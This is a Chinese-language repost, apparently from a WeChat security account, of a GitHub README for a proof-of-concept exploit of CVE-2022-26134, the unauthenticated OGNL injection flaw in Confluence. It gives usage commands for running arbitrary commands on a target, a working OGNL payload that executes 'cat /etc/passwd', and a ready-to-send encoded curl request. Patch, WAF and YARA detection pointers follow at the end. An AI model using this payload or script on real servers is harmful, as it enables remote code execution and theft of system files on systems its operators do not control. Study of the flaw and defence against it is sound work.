CVE-2022-26134 - OGNL 注入漏洞。
利用影响 Atlassian Confluence 7.18 及更低版本产品的远程代码执行漏洞的脚本概念验证。OGNL 注入漏洞允许未经身份验证的用户在 Confluence 服务器或数据中心实例上执行任意代码。
受影响的版本
所有受支持的 Confluence Server 和 Data Center 版本都会受到影响。
Confluence Server 和 Data Center 1.3.0 之后的版本和 7.18.1 以下的版本会受到影响。
该漏洞的 CVSS 得分为 10 分(满分 10 分)的严重性。
依赖项:
Python 3.3+
可以通过 pip install -r requirements.txt 满足依赖关系
如何使用:
克隆仓库
git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134
然后,您可以使用您选择的命令运行漏洞利用程序,如下所示:
python3 cve-2022-26134.py https://target.com CMD
python3 cve-2022-26134.py https://target.com id
python3 cve-2022-26134.py https://target.com "ps aux"
脚本 PoC CVE-2022-26134
视频概念证明
https://youtu.be/AoPVDMihNgA
有效载荷
${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
CURL 命令示例:
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
然后,命令的结果将反映在X-Cmd-Response响应头中的参数中。
供应商的缓解指南
遵循 Atlassian 的官方建议:
https ://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
修补版本
Atlassian 发布了 7.4.17、7.13.7、7.14.3、7.15.2、7.16.4、7.17.4 和 7.18.1 版本,其中包含针对此问题的补丁。
检测能力
此漏洞影响所有自托管实例。如果您使用 WAF,则可以${在内部阻止 URL。
YARA(通过 Volexity):
https ://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar
原文链接:https://github.com/Nwqda/CVE-2022-26134
原文始发于微信公众号(Ots安全):CVE-2022-26134 - OGNL 注入漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论